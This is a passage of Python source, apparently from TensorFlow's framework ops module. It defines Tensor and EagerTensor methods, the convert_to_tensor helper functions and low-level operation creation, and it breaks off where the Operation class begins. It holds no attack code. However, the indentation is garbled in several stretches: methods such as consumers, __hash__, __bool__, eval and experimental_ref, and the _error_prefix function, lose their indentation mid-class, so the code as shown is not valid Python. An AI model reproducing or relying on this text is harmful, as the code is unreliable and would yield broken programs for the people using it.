      self._disallow_in_graph_mode("iterating over `tf.Tensor`")

  def __iter__(self):
    """Yields `self[i]` along the first dimension; eager execution only."""
    if not context.executing_eagerly():
      self._disallow_iteration()

    shape = self._shape_tuple()
    if shape is None:
      raise TypeError("Cannot iterate over a tensor with unknown shape.")
    if not shape:
      raise TypeError("Cannot iterate over a scalar tensor.")
    if shape[0] is None:
      raise TypeError(
          "Cannot iterate over a tensor with unknown first dimension.")
    for i in xrange(shape[0]):
      yield self[i]

  def _shape_as_list(self):
    # Static shape as a plain list (None for unknown dims), or None when the
    # rank itself is unknown.
    if self.shape.ndims is not None:
      return [dim.value for dim in self.shape.dims]
    else:
      return None

  def _shape_tuple(self):
    # Hashable tuple version of _shape_as_list(); None when rank is unknown.
    shape = self._shape_as_list()
    if shape is None:
      return None
    return tuple(shape)

  def _rank(self):
    """Integer rank of this Tensor, if known, else None.

    Returns:
      Integer rank or None
    """
    return self.shape.ndims

  def get_shape(self):
    """Alias of Tensor.shape."""
    return self.shape
  def set_shape(self, shape):
    """Updates the shape of this tensor.
    This method can be called multiple times, and will merge the given
    `shape` with the current shape of this tensor. It can be used to
    provide additional information about the shape of this tensor that
    cannot be inferred from the graph alone. For example, this can be used
    to provide additional information about the shapes of images:
    ```python
    _, image_data = tf.compat.v1.TFRecordReader(...).read(...)
    image = tf.image.decode_png(image_data, channels=3)
    # The height and width dimensions of `image` are data dependent, and
    # cannot be computed without executing the op.
    print(image.shape)
    ==> TensorShape([Dimension(None), Dimension(None), Dimension(3)])
    # We know that each image in this dataset is 28 x 28 pixels.
    image.set_shape([28, 28, 3])
    print(image.shape)
    ==> TensorShape([Dimension(28), Dimension(28), Dimension(3)])
    ```
    NOTE: This shape is not enforced at runtime. Setting incorrect shapes can
    result in inconsistencies between the statically-known graph and the runtime
    value of tensors. For runtime validation of the shape, use `tf.ensure_shape`
    instead.
    Args:
      shape: A `TensorShape` representing the shape of this tensor, a
        `TensorShapeProto`, a list, a tuple, or None.
    Raises:
      ValueError: If `shape` is not compatible with the current shape of
        this tensor.
    """
    # Reset cached shape.
    self._shape_val = None
    # We want set_shape to be reflected in the C API graph for when we run it.
    if not isinstance(shape, tensor_shape.TensorShape):
      shape = tensor_shape.TensorShape(shape)
    dim_list = []
    if shape.dims is None:
      unknown_shape = True
    else:
      unknown_shape = False
      # The C API encodes an unknown dimension as -1.
      for dim in shape.dims:
        if dim.value is None:
          dim_list.append(-1)
        else:
          dim_list.append(dim.value)
    try:
      c_api.TF_GraphSetTensorShape_wrapper(
          self._op._graph._c_graph,  # pylint: disable=protected-access
          self._as_tf_output(),
          dim_list,
          unknown_shape)
    except errors.InvalidArgumentError as e:
      # Convert to ValueError for backwards compatibility.
      raise ValueError(str(e))
  @property
  def value_index(self):
    """The index of this tensor in the outputs of its `Operation`."""
    # Set when this Tensor object was constructed; read-only thereafter.
    return self._value_index
def consumers(self):
"""Returns a list of `Operation`s that consume this tensor.
Returns:
A list of `Operation`s.
"""
consumer_names = c_api.TF_OperationOutputConsumers_wrapper(
self._as_tf_output())
# pylint: disable=protected-access
return [
self.graph._get_operation_by_name_unsafe(name)
for name in consumer_names
]
# pylint: enable=protected-access
def _as_node_def_input(self):
"""Return a value to use for the NodeDef "input" attribute.
The returned string can be used in a NodeDef "input" attribute
to indicate that the NodeDef uses this Tensor as input.
Raises:
ValueError: if this Tensor's Operation does not have a name.
Returns:
a string.
"""
if not self._op.name:
raise ValueError("Operation was not named: %s" % self._op)
if self._value_index == 0:
return self._op.name
else:
return "%s:%d" % (self._op.name, self._value_index)
  def _as_tf_output(self):
    """Returns (and caches) the TF_Output wrapper for this tensor."""
    # pylint: disable=protected-access
    # NOTE: Beyond preventing unnecessary (re-)allocation, the cached object
    # also guarantees that a dictionary of tf_output objects will retain a
    # deterministic (yet unsorted) order which prevents memory blowup in the
    # cache of executor(s) stored for every session.
    if self._tf_output is None:
      self._tf_output = c_api_util.tf_output(self.op._c_op, self.value_index)
    return self._tf_output
    # pylint: enable=protected-access
def __str__(self):
return "Tensor(\"%s\"%s%s%s)" % (
self.name,
(", shape=%s" %
self.get_shape()) if self.get_shape().ndims is not None else "",
(", dtype=%s" % self._dtype.name) if self._dtype else "",
(", device=%s" % self.device) if self.device else "")
def __repr__(self):
return "<tf.Tensor '%s' shape=%s dtype=%s>" % (self.name, self.get_shape(),
self._dtype.name)
def __hash__(self):
g = getattr(self, "graph", None)
if (Tensor._USE_EQUALITY and executing_eagerly_outside_functions() and
(g is None or g._building_function)): # pylint: disable=protected-access
raise TypeError("Tensor is unhashable if Tensor equality is enabled. "
"Instead, use tensor.experimental_ref() as the key.")
else:
return id(self)
def __copy__(self):
# TODO(b/77597810): get rid of Tensor copies.
cls = self.__class__
result = cls.__new__(cls)
result.__dict__.update(self.__dict__)
return result
  # NOTE(mrry): This enables the Tensor's overloaded "right" binary
  # operators to run when the left operand is an ndarray, because it
  # accords the Tensor class higher priority than an ndarray, or a
  # numpy matrix.
  # TODO(mrry): Convert this to using numpy's __numpy_ufunc__
  # mechanism, which allows more control over how Tensors interact
  # with ndarrays.
  __array_priority__ = 100
  def __array__(self):
    """Always raises: a symbolic Tensor has no materialized numpy value."""
    raise NotImplementedError("Cannot convert a symbolic Tensor ({}) to a numpy"
                              " array.".format(self.name))
def __len__(self):
raise TypeError("len is not well defined for symbolic Tensors. ({}) "
"Please call `x.shape` rather than `len(x)` for "
"shape information.".format(self.name))
  @staticmethod
  def _override_operator(operator, func):
    """Registers `func` as the implementation of `operator` on `Tensor`."""
    _override_helper(Tensor, operator, func)
def __bool__(self):
"""Dummy method to prevent a tensor from being used as a Python `bool`.
This overload raises a `TypeError` when the user inadvertently
treats a `Tensor` as a boolean (most commonly in an `if` or `while`
statement), in code that was not converted by AutoGraph. For example:
```python
if tf.constant(True): # Will raise.
# ...
if tf.constant(5) < tf.constant(7): # Will raise.
# ...
```
Raises:
`TypeError`.
"""
self._disallow_bool_casting()
def __nonzero__(self):
"""Dummy method to prevent a tensor from being used as a Python `bool`.
This is the Python 2.x counterpart to `__bool__()` above.
Raises:
`TypeError`.
"""
self._disallow_bool_casting()
def eval(self, feed_dict=None, session=None):
"""Evaluates this tensor in a `Session`.
Calling this method will execute all preceding operations that
produce the inputs needed for the operation that produces this
tensor.
*N.B.* Before invoking `Tensor.eval()`, its graph must have been
launched in a session, and either a default session must be
available, or `session` must be specified explicitly.
Args:
feed_dict: A dictionary that maps `Tensor` objects to feed values. See
`tf.Session.run` for a description of the valid feed values.
session: (Optional.) The `Session` to be used to evaluate this tensor. If
none, the default session will be used.
Returns:
A numpy array corresponding to the value of this tensor.
"""
return _eval_using_default_session(self, feed_dict, self.graph, session)
def experimental_ref(self):
# tf.Variable also has the same experimental_ref() API. If you update the
# documenation here, please update tf.Variable.experimental_ref() as well.
"""Returns a hashable reference object to this Tensor.
Warning: Experimental API that could be changed or removed.
The primary usecase for this API is to put tensors in a set/dictionary.
We can't put tensors in a set/dictionary as `tensor.__hash__()` is no longer
available starting Tensorflow 2.0.
```python
import tensorflow as tf
x = tf.constant(5)
y = tf.constant(10)
z = tf.constant(10)
# The followings will raise an exception starting 2.0
# TypeError: Tensor is unhashable if Tensor equality is enabled.
tensor_set = {x, y, z}
tensor_dict = {x: 'five', y: 'ten', z: 'ten'}
```
Instead, we can use `tensor.experimental_ref()`.
```python
tensor_set = {x.experimental_ref(),
y.experimental_ref(),
z.experimental_ref()}
print(x.experimental_ref() in tensor_set)
==> True
tensor_dict = {x.experimental_ref(): 'five',
y.experimental_ref(): 'ten',
z.experimental_ref(): 'ten'}
print(tensor_dict[y.experimental_ref()])
==> ten
```
Also, the reference object provides `.deref()` function that returns the
original Tensor.
```python
x = tf.constant(5)
print(x.experimental_ref().deref())
==> tf.Tensor(5, shape=(), dtype=int32)
```
"""
return object_identity.Reference(self)
# TODO(agarwal): consider getting rid of this.
class _EagerTensorBase(Tensor):
  """Base class for EagerTensor.

  The concrete `EagerTensor` subclass is created in C (see
  `TFE_Py_InitEagerTensor` below); methods raising `NotImplementedError`
  here are expected to be provided by that C implementation.
  """
  # __int__, __float__ and __index__ may copy the tensor to CPU and
  # only work for scalars; values are cast as per numpy.
  def __int__(self):
    return int(self._numpy())
  def __long__(self):
    # Python 2 only; `long` does not exist under Python 3, where this
    # method is never invoked by the interpreter.
    return long(self._numpy())
  def __float__(self):
    return float(self._numpy())
  def __index__(self):
    maybe_arr = self._numpy()
    if isinstance(maybe_arr, np.ndarray):
      return maybe_arr.__index__()
    return int(maybe_arr)  # Must be a NumPy scalar.
  def __bool__(self):
    return bool(self._numpy())
  __nonzero__ = __bool__
  def __format__(self, format_spec):
    # Delegate formatting to the underlying numpy value.
    return self._numpy().__format__(format_spec)
  def __reduce__(self):
    # Pickle as the numpy value; unpickling rebuilds via convert_to_tensor.
    return convert_to_tensor, (self._numpy(),)
  def __copy__(self):
    # Eager Tensors are immutable so it's safe to return themselves as a copy.
    return self
  def __deepcopy__(self, memo):
    # Eager Tensors are immutable so it's safe to return themselves as a copy.
    del memo
    return self
  def __str__(self):
    return "tf.Tensor(%s, shape=%s, dtype=%s)" % (numpy_text(self), self.shape,
                                                  self.dtype.name)
  def __repr__(self):
    return "<tf.Tensor: id=%s, shape=%s, dtype=%s, numpy=%s>" % (
        self._id, self.shape, self.dtype.name, numpy_text(self, is_repr=True))
  def __len__(self):
    """Returns the length of the first dimension in the Tensor."""
    if not self.shape.ndims:
      raise TypeError("Scalar tensor has no `len()`")
    return self._shape_tuple()[0]
  def _numpy(self):
    # Implemented by the C-defined EagerTensor subclass.
    raise NotImplementedError()
  @property
  def dtype(self):
    # Note: using the intern table directly here as this is
    # performance-sensitive in some models.
    return dtypes._INTERN_TABLE[self._datatype_enum()]  # pylint: disable=protected-access
  def numpy(self):
    """Returns a numpy array or a scalar with the same contents as the Tensor.
    TODO(ashankar,agarwal): Perhaps this should NOT reference the underlying
    buffer but instead always explicitly copy? Note that currently it may or may
    not copy based on whether the numpy data is properly aligned or not.
    Returns:
      A numpy array or a scalar. Numpy array may share memory with the
      Tensor object. Any changes to one may be reflected in the other. A scalar
      value is returned when self has rank 0.
    Raises:
      ValueError: if the type of this Tensor is not representable in numpy.
    """
    maybe_arr = self._numpy()  # pylint: disable=protected-access
    return maybe_arr.copy() if isinstance(maybe_arr, np.ndarray) else maybe_arr
  @property
  def backing_device(self):
    """Returns the name of the device holding this tensor's memory.
    `.backing_device` is usually the same as `.device`, which returns
    the device on which the kernel of the operation that produced this tensor
    ran. However, some operations can produce tensors on a different device
    (e.g., an operation that executes on the GPU but produces output tensors
    in host memory).
    """
    raise NotImplementedError()
  def _datatype_enum(self):
    # Implemented by the C-defined EagerTensor subclass.
    raise NotImplementedError()
  def _shape_tuple(self):
    """The shape of this Tensor, as a tuple.
    This is more performant than tuple(shape().as_list()) as it avoids
    two list and one object creation. Marked private for now as from an API
    perspective, it would be better to have a single performant way of
    getting a shape rather than exposing shape() and shape_tuple()
    (and heaven forbid, shape_list() etc. as well!). Punting on that for now,
    but ideally one would work things out and remove the need for this method.
    Returns:
      tuple with the shape.
    """
    raise NotImplementedError()
  def _rank(self):
    """Integer rank of this Tensor.
    Unlike regular Tensors, the rank is always known for EagerTensors.
    This is more performant than len(self._shape_tuple())
    Returns:
      Integer rank
    """
    raise NotImplementedError()
  def _num_elements(self):
    """Number of elements of this Tensor.
    Unlike regular Tensors, the number of elements is always known for
    EagerTensors.
    This is more performant than tensor.shape.num_elements
    Returns:
      Long - num elements in the tensor
    """
    raise NotImplementedError()
  def _copy_to_device(self, device_name):  # pylint: disable=redefined-outer-name
    # Implemented by the C-defined EagerTensor subclass.
    raise NotImplementedError()
  @staticmethod
  def _override_operator(name, func):
    """Registers `func` as the implementation of `name` on this class."""
    setattr(_EagerTensorBase, name, func)
  def _copy_nograd(self, ctx=None, device_name=None):
    """Copies tensor to dest device, but doesn't record the operation."""
    # Creates a new tensor on the dest device.
    if ctx is None:
      ctx = context.context()
    if device_name is None:
      device_name = ctx.device_name
    # pylint: disable=protected-access
    try:
      ctx.ensure_initialized()
      new_tensor = self._copy_to_device(device_name)
    except core._NotOkStatusException as e:
      # Re-raise as a TF error without chaining the internal status exception.
      six.raise_from(core._status_to_exception(e.code, e.message), None)
    return new_tensor
  def _copy(self, ctx=None, device_name=None):
    """Copies tensor to dest device."""
    new_tensor = self._copy_nograd(ctx, device_name)
    # Record the copy on tape and define backprop copy as well.
    if context.executing_eagerly():
      self_device = self.device
      def grad_fun(dresult):
        # Gradient of a copy is a copy back to the source device.
        return [
            dresult._copy(device_name=self_device)
            if hasattr(dresult, "_copy") else dresult
        ]
      tape.record_operation("_copy", [new_tensor], [self], grad_fun)
    return new_tensor
  # pylint: enable=protected-access
  @property
  def shape(self):
    if self._tensor_shape is None:  # pylint: disable=access-member-before-definition
      # `_tensor_shape` is declared and defined in the definition of
      # `EagerTensor`, in C.
      self._tensor_shape = tensor_shape.TensorShape(self._shape_tuple())
    return self._tensor_shape
  def get_shape(self):
    """Alias of Tensor.shape."""
    return self.shape
  def _shape_as_list(self):
    """The shape of the tensor as a list."""
    return list(self._shape_tuple())
  @property
  def ndim(self):
    """Returns the number of Tensor dimensions."""
    return self.shape.ndims
  @deprecation.deprecated(None, "Use tf.identity instead.")
  def cpu(self):
    """A copy of this Tensor with contents backed by host memory."""
    return self._copy(context.context(), "CPU:0")
  @deprecation.deprecated(None, "Use tf.identity instead.")
  def gpu(self, gpu_index=0):
    """A copy of this Tensor with contents backed by memory on the GPU.
    Arguments:
      gpu_index: Identifies which GPU to place the contents on the returned
        Tensor in.
    Returns:
      A GPU-memory backed Tensor object initialized with the same contents
      as this Tensor.
    """
    return self._copy(context.context(), "GPU:" + str(gpu_index))
  def set_shape(self, shape):
    # Eager tensors already have a concrete shape; only validate compatibility.
    if not self.shape.is_compatible_with(shape):
      raise ValueError(
          "Tensor's shape %s is not compatible with supplied shape %s" %
          (self.shape, shape))
  # Methods not supported / implemented for Eager Tensors.
  @property
  def op(self):
    raise AttributeError(
        "Tensor.op is meaningless when eager execution is enabled.")
  @property
  def graph(self):
    raise AttributeError(
        "Tensor.graph is meaningless when eager execution is enabled.")
  @property
  def name(self):
    raise AttributeError(
        "Tensor.name is meaningless when eager execution is enabled.")
  @property
  def value_index(self):
    raise AttributeError(
        "Tensor.value_index is meaningless when eager execution is enabled.")
  def consumers(self):
    raise NotImplementedError(
        "Tensor.consumers is meaningless when eager execution is enabled.")
  def _add_consumer(self, consumer):
    raise NotImplementedError(
        "_add_consumer not supported when eager execution is enabled.")
  def _as_node_def_input(self):
    raise NotImplementedError(
        "_as_node_def_input not supported when eager execution is enabled.")
  def _as_tf_output(self):
    raise NotImplementedError(
        "_as_tf_output not supported when eager execution is enabled.")
  def eval(self, feed_dict=None, session=None):
    raise NotImplementedError(
        "eval is not supported when eager execution is enabled, "
        "is .numpy() what you're looking for?")
# This call creates an EagerTensor class, as a subclass of _EagerTensorBase, and
# registers it with the current module.
EagerTensor = c_api.TFE_Py_InitEagerTensor(_EagerTensorBase)
# Make Tensor recognized as a "dense tensor-like" type by framework checks.
register_dense_tensor_like_type(Tensor)
@tf_export(v1=["convert_to_tensor"])
def convert_to_tensor(value,
                      dtype=None,
                      name=None,
                      preferred_dtype=None,
                      dtype_hint=None):
  """Converts the given `value` to a `Tensor` (TF1 endpoint).
  Accepts `Tensor` objects, numpy arrays, Python lists, and Python scalars:
  ```python
  import numpy as np
  def my_func(arg):
    arg = tf.convert_to_tensor(arg, dtype=tf.float32)
    return tf.matmul(arg, arg) + arg
  # The following calls are equivalent.
  value_1 = my_func(tf.constant([[1.0, 2.0], [3.0, 4.0]]))
  value_2 = my_func([[1.0, 2.0], [3.0, 4.0]])
  value_3 = my_func(np.array([[1.0, 2.0], [3.0, 4.0]], dtype=np.float32))
  ```
  This is useful when composing a new operation in Python (such as `my_func`
  above): standard Python op constructors apply this function to each of their
  Tensor-valued inputs so they also accept numpy arrays, lists, and scalars.
  Note: This function diverges from default Numpy behavior for `float` and
  `string` types when `None` is present in a Python list or scalar. Rather
  than silently converting `None` values, an error will be thrown.
  Args:
    value: An object whose type has a registered `Tensor` conversion function.
    dtype: Optional element type for the returned tensor. If missing, the type
      is inferred from the type of `value`.
    name: Optional name to use if a new `Tensor` is created.
    preferred_dtype: Optional element type for the returned tensor, used as a
      soft preference when `dtype` is None. If the conversion to
      `preferred_dtype` is not possible, this argument has no effect.
    dtype_hint: same meaning as preferred_dtype, and overrides it.
  Returns:
    A `Tensor` based on `value`.
  Raises:
    TypeError: If no conversion function is registered for `value` to `dtype`.
    RuntimeError: If a registered conversion function returns an invalid value.
    ValueError: If the `value` is a tensor not of given `dtype` in graph mode.
  """
  # `dtype_hint` is the TF2 spelling of `preferred_dtype`; reconcile them
  # (emitting a deprecation warning when both/old one are used).
  preferred_dtype = deprecation.deprecated_argument_lookup(
      "dtype_hint", dtype_hint, "preferred_dtype", preferred_dtype)
  return convert_to_tensor_v2(value, dtype, preferred_dtype, name)
@tf_export("convert_to_tensor", v1=[])
def convert_to_tensor_v2(value, dtype=None, dtype_hint=None, name=None):
  """Converts the given `value` to a `Tensor` (TF2 endpoint).
  Accepts `Tensor` objects, numpy arrays, Python lists, and Python scalars:
  ```python
  import numpy as np
  def my_func(arg):
    arg = tf.convert_to_tensor(arg, dtype=tf.float32)
    return tf.matmul(arg, arg) + arg
  # The following calls are equivalent.
  value_1 = my_func(tf.constant([[1.0, 2.0], [3.0, 4.0]]))
  value_2 = my_func([[1.0, 2.0], [3.0, 4.0]])
  value_3 = my_func(np.array([[1.0, 2.0], [3.0, 4.0]], dtype=np.float32))
  ```
  This is useful when composing a new operation in Python (such as `my_func`
  above): standard Python op constructors apply this function to each of their
  Tensor-valued inputs so they also accept numpy arrays, lists, and scalars.
  Note: This function diverges from default Numpy behavior for `float` and
  `string` types when `None` is present in a Python list or scalar. Rather
  than silently converting `None` values, an error will be thrown.
  Args:
    value: An object whose type has a registered `Tensor` conversion function.
    dtype: Optional element type for the returned tensor. If missing, the type
      is inferred from the type of `value`.
    dtype_hint: Optional element type for the returned tensor, used as a soft
      preference when `dtype` is None. If the conversion to `dtype_hint` is
      not possible, this argument has no effect.
    name: Optional name to use if a new `Tensor` is created.
  Returns:
    A `Tensor` based on `value`.
  Raises:
    TypeError: If no conversion function is registered for `value` to `dtype`.
    RuntimeError: If a registered conversion function returns an invalid value.
    ValueError: If the `value` is a tensor not of given `dtype` in graph mode.
  """
  return internal_convert_to_tensor(
      value=value, dtype=dtype, name=name, preferred_dtype=dtype_hint,
      as_ref=False)
def _error_prefix(name):
return "" if name is None else "%s: " % name
def internal_convert_to_tensor(value,
                               dtype=None,
                               name=None,
                               as_ref=False,
                               preferred_dtype=None,
                               ctx=None,
                               accepted_result_types=(Tensor,)):
  """Implementation of the public convert_to_tensor.

  Tries each registered conversion function for `type(value)` in order;
  the first one that does not return `NotImplemented` wins. When `dtype`
  is None but `preferred_dtype` is given, a conversion to the preferred
  dtype is attempted first and silently abandoned on TypeError/ValueError.
  """
  # Fast path: an EagerTensor used while building a graph must be captured
  # by the enclosing function's graph rather than converted.
  if isinstance(value, EagerTensor):
    if ctx is None:
      ctx = context.context()
    if not ctx.executing_eagerly():
      graph = get_default_graph()
      if not graph.building_function:
        raise RuntimeError("Attempting to capture an EagerTensor without "
                           "building a function.")
      return graph.capture(value, name=name)
  if dtype is not None:
    dtype = dtypes.as_dtype(dtype)
  # A graph Tensor passes through unchanged, provided the dtype matches.
  if isinstance(value, Tensor):
    if dtype is not None and not dtype.is_compatible_with(value.dtype):
      raise ValueError(
          "Tensor conversion requested dtype %s for Tensor with dtype %s: %r" %
          (dtype.name, value.dtype.name, value))
    return value
  if preferred_dtype is not None:
    preferred_dtype = dtypes.as_dtype(preferred_dtype)
  for base_type, conversion_func in tensor_conversion_registry.get(type(value)):
    # If dtype is None but preferred_dtype is not None, we try to
    # cast to preferred_dtype first.
    ret = None
    if dtype is None and preferred_dtype is not None:
      try:
        ret = conversion_func(
            value, dtype=preferred_dtype, name=name, as_ref=as_ref)
      except (TypeError, ValueError):
        # Could not coerce the conversion to use the preferred dtype.
        pass
      else:
        # The conversion succeeded: it must have honored the preferred dtype.
        if (ret is not NotImplemented and
            ret.dtype.base_dtype != preferred_dtype.base_dtype):
          raise TypeError("convert_to_tensor did not convert to "
                          "the preferred dtype: %s vs %s " %
                          (ret.dtype.base_dtype, preferred_dtype.base_dtype))
    if ret is None:
      ret = conversion_func(value, dtype=dtype, name=name, as_ref=as_ref)
    if ret is NotImplemented:
      # This function declined; try the next registered conversion function.
      continue
    if not isinstance(ret, accepted_result_types):
      raise RuntimeError(
          "%sConversion function %r for type %s returned non-Tensor: %r" %
          (_error_prefix(name), conversion_func, base_type, ret))
    if dtype and not dtype.is_compatible_with(ret.dtype):
      raise RuntimeError(
          "%sConversion function %r for type %s returned incompatible "
          "dtype: requested = %s, actual = %s" %
          (_error_prefix(name), conversion_func, base_type, dtype.name,
           ret.dtype.name))
    return ret
  raise TypeError("%sCannot convert %r with type %s to Tensor: "
                  "no conversion function registered." %
                  (_error_prefix(name), value, type(value)))
def internal_convert_n_to_tensor(values,
                                 dtype=None,
                                 name=None,
                                 as_ref=False,
                                 preferred_dtype=None,
                                 ctx=None):
  """Converts `values` to a list of `Tensor` objects.
  Args:
    values: A list of objects that can be consumed by `tf.convert_to_tensor()`.
    dtype: (Optional.) The required `DType` of the returned `Tensor` objects.
    name: (Optional.) A name prefix to used when a new `Tensor` is created, in
      which case element `i` will be given the name `name + '_' + i`.
    as_ref: True if the caller wants the results as ref tensors.
    preferred_dtype: Optional element type for the returned tensors, used as a
      soft preference when dtype is None. If the conversion to
      `preferred_dtype` is not possible, this argument has no effect.
    ctx: The value of context.context().
  Returns:
    A list of `Tensor` and/or `IndexedSlices` objects.
  Raises:
    TypeError: If no conversion function is registered for an element in
      `values`, or if `values` is not a sequence.
    RuntimeError: If a registered conversion function returns an invalid
      value.
  """
  if not isinstance(values, collections_abc.Sequence):
    raise TypeError("values must be a sequence.")
  if ctx is None:
    ctx = context.context()
  # Element i gets the derived name "<name>_<i>" when a prefix was given.
  return [
      internal_convert_to_tensor(
          value,
          dtype=dtype,
          name=None if name is None else "%s_%d" % (name, i),
          as_ref=as_ref,
          preferred_dtype=preferred_dtype,
          ctx=ctx) for i, value in enumerate(values)
  ]
def convert_n_to_tensor(values, dtype=None, name=None, preferred_dtype=None):
  """Converts `values` to a list of `Tensor` objects.
  Args:
    values: A list of objects that can be consumed by `tf.convert_to_tensor()`.
    dtype: (Optional.) The required `DType` of the returned `Tensor` objects.
    name: (Optional.) A name prefix to used when a new `Tensor` is created, in
      which case element `i` will be given the name `name + '_' + i`.
    preferred_dtype: Optional element type for the returned tensors, used as a
      soft preference when dtype is None. If the conversion to
      `preferred_dtype` is not possible, this argument has no effect.
  Returns:
    A list of `Tensor` and/or `IndexedSlices` objects.
  Raises:
    TypeError: If no conversion function is registered for an element in
      `values`.
    RuntimeError: If a registered conversion function returns an invalid
      value.
  """
  # Thin public wrapper: identical to the internal variant with as_ref=False.
  return internal_convert_n_to_tensor(
      values=values, dtype=dtype, name=name,
      preferred_dtype=preferred_dtype, as_ref=False)
def convert_to_tensor_or_composite(value, dtype=None, name=None):
  """Converts the given object to a `Tensor` or `CompositeTensor`.
  A `CompositeTensor` passes through unmodified; anything else goes through
  `convert_to_tensor()`.
  Args:
    value: A `CompositeTensor` or an object that can be consumed by
      `convert_to_tensor()`.
    dtype: (Optional.) The required `DType` of the returned `Tensor` or
      `CompositeTensor`.
    name: (Optional.) A name to use if a new `Tensor` is created.
  Returns:
    A `Tensor` or `CompositeTensor`, based on `value`.
  Raises:
    ValueError: If `dtype` does not match the element type of `value`.
  """
  return internal_convert_to_tensor_or_composite(
      value=value, dtype=dtype, name=name, as_ref=False)
def internal_convert_to_tensor_or_composite(value,
                                            dtype=None,
                                            name=None,
                                            as_ref=False):
  """Converts the given object to a `Tensor` or `CompositeTensor`.
  A `CompositeTensor` passes through unmodified (after a dtype compatibility
  check); anything else goes through `convert_to_tensor()`.
  Args:
    value: A `CompositeTensor`, or an object that can be consumed by
      `convert_to_tensor()`.
    dtype: (Optional.) The required `DType` of the returned `Tensor` or
      `CompositeTensor`.
    name: (Optional.) A name to use if a new `Tensor` is created.
    as_ref: True if the caller wants the results as ref tensors.
  Returns:
    A `Tensor` or `CompositeTensor`, based on `value`.
  Raises:
    ValueError: If `dtype` does not match the element type of `value`.
  """
  if not isinstance(value, composite_tensor.CompositeTensor):
    # Composite tensors are also acceptable results of the conversion.
    return internal_convert_to_tensor(
        value,
        dtype=dtype,
        name=name,
        as_ref=as_ref,
        accepted_result_types=(Tensor, composite_tensor.CompositeTensor))
  value_dtype = getattr(value, "dtype", None)
  if dtype and not dtypes.as_dtype(dtype).is_compatible_with(value_dtype):
    raise ValueError(
        "Tensor conversion requested dtype %s for Tensor with dtype %s: %r" %
        (dtypes.as_dtype(dtype).name, value.dtype.name, str(value)))
  return value
def internal_convert_n_to_tensor_or_composite(values,
                                              dtype=None,
                                              name=None,
                                              as_ref=False):
  """Converts `values` to a list of `Tensor` or `CompositeTensor` objects.
  Any `CompositeTensor` objects in `values` are returned unmodified, and
  `None` entries pass through as `None`.
  Args:
    values: A list of `None`, `CompositeTensor`, or objects that can be consumed
      by `convert_to_tensor()`.
    dtype: (Optional.) The required `DType` of the returned `Tensor`s or
      `CompositeTensor`s.
    name: (Optional.) A name prefix to used when a new `Tensor` is created, in
      which case element `i` will be given the name `name + '_' + i`.
    as_ref: True if the caller wants the results as ref tensors.
  Returns:
    A list of `Tensor`, `CompositeTensor`, and/or `None` objects.
  Raises:
    TypeError: If no conversion function is registered for an element in
      `values`, or if `values` is not a sequence.
    RuntimeError: If a registered conversion function returns an invalid
      value.
  """
  if not isinstance(values, collections_abc.Sequence):
    raise TypeError("values must be a sequence.")
  return [
      None if value is None else internal_convert_to_tensor_or_composite(
          value,
          dtype=dtype,
          name=None if name is None else "%s_%d" % (name, i),
          as_ref=as_ref) for i, value in enumerate(values)
  ]
def convert_n_to_tensor_or_composite(values, dtype=None, name=None):
  """Converts `values` to a list of `Tensor` or `CompositeTensor` objects.
  Any `CompositeTensor` objects in `values` are returned unmodified.
  Args:
    values: A list of `None`, `CompositeTensor`, or objects that can be
      consumed by `convert_to_tensor()`.
    dtype: (Optional.) The required `DType` of the returned `Tensor`s or
      `CompositeTensor`s.
    name: (Optional.) A name prefix to used when a new `Tensor` is created, in
      which case element `i` will be given the name `name + '_' + i`.
  Returns:
    A list of `Tensor` and/or `CompositeTensor` objects.
  Raises:
    TypeError: If no conversion function is registered for an element in
      `values`.
    RuntimeError: If a registered conversion function returns an invalid
      value.
  """
  # Thin public wrapper: identical to the internal variant with as_ref=False.
  return internal_convert_n_to_tensor_or_composite(
      values=values, dtype=dtype, name=name, as_ref=False)
def _device_string(dev_spec):
  """Returns `dev_spec` as a device string, serializing DeviceSpec objects."""
  return dev_spec.to_string() if pydev.is_device_spec(dev_spec) else dev_spec
def _NodeDef(op_type, name, attrs=None):
  """Create a NodeDef proto.
  Args:
    op_type: Value for the "op" attribute of the NodeDef proto.
    name: Value for the "name" attribute of the NodeDef proto.
    attrs: Dictionary where the key is the attribute name (a string)
      and the value is the respective "attr" attribute of the NodeDef proto (an
      AttrValue).
  Returns:
    A node_def_pb2.NodeDef protocol buffer.
  """
  node_def = node_def_pb2.NodeDef(op=compat.as_bytes(op_type),
                                  name=compat.as_bytes(name))
  for attr_name, attr_value in six.iteritems(attrs or {}):
    node_def.attr[attr_name].CopyFrom(attr_value)
  return node_def
# Copied from core/framework/node_def_util.cc
# TODO(mrry,josh11b): Consolidate this validation in C++ code.
# Op names must start with an alphanumeric or '.'; scope names may be empty.
_VALID_OP_NAME_REGEX = re.compile("^[A-Za-z0-9.][A-Za-z0-9_.\\-/]*$")
_VALID_SCOPE_NAME_REGEX = re.compile("^[A-Za-z0-9_.\\-/]*$")
def _create_c_op(graph, node_def, inputs, control_inputs):
  """Creates a TF_Operation.
  Args:
    graph: a `Graph`.
    node_def: `node_def_pb2.NodeDef` for the operation to create.
    inputs: A list of `Tensor`s (corresponding to scalar inputs) and lists of
      `Tensor`s (corresponding to sequence inputs, e.g. "int64 * N",
      "list(int64)"). The length of the list should be equal to the number of
      inputs specified by this operation's op def.
    control_inputs: A list of `Operation`s to set as control dependencies.
  Returns:
    A wrapped TF_Operation*.
  Raises:
    ValueError: If the C API rejects the operation (e.g. invalid inputs).
  """
  # pylint: disable=protected-access
  op_desc = c_api.TF_NewOperation(graph._c_graph, compat.as_str(node_def.op),
                                  compat.as_str(node_def.name))
  if node_def.device:
    c_api.TF_SetDevice(op_desc, compat.as_str(node_def.device))
  # Add inputs
  for op_input in inputs:
    # A list/tuple element corresponds to a sequence ("list(type)") input.
    if isinstance(op_input, (list, tuple)):
      c_api.TF_AddInputList(op_desc, [t._as_tf_output() for t in op_input])
    else:
      c_api.TF_AddInput(op_desc, op_input._as_tf_output())
  # Add control inputs
  for control_input in control_inputs:
    c_api.TF_AddControlInput(op_desc, control_input._c_op)
  # pylint: enable=protected-access
  # Add attrs
  for name, attr_value in node_def.attr.items():
    serialized = attr_value.SerializeToString()
    # TODO(skyewm): this creates and deletes a new TF_Status for every attr.
    # It might be worth creating a convenient way to re-use the same status.
    c_api.TF_SetAttrValueProto(op_desc, compat.as_str(name), serialized)
  try:
    c_op = c_api.TF_FinishOperation(op_desc)
  except errors.InvalidArgumentError as e:
    # Convert to ValueError for backwards compatibility.
    raise ValueError(str(e))
  return c_op
@tf_export("Operation")
class Operation(object):
  """Represents a graph node that performs computation on tensors.
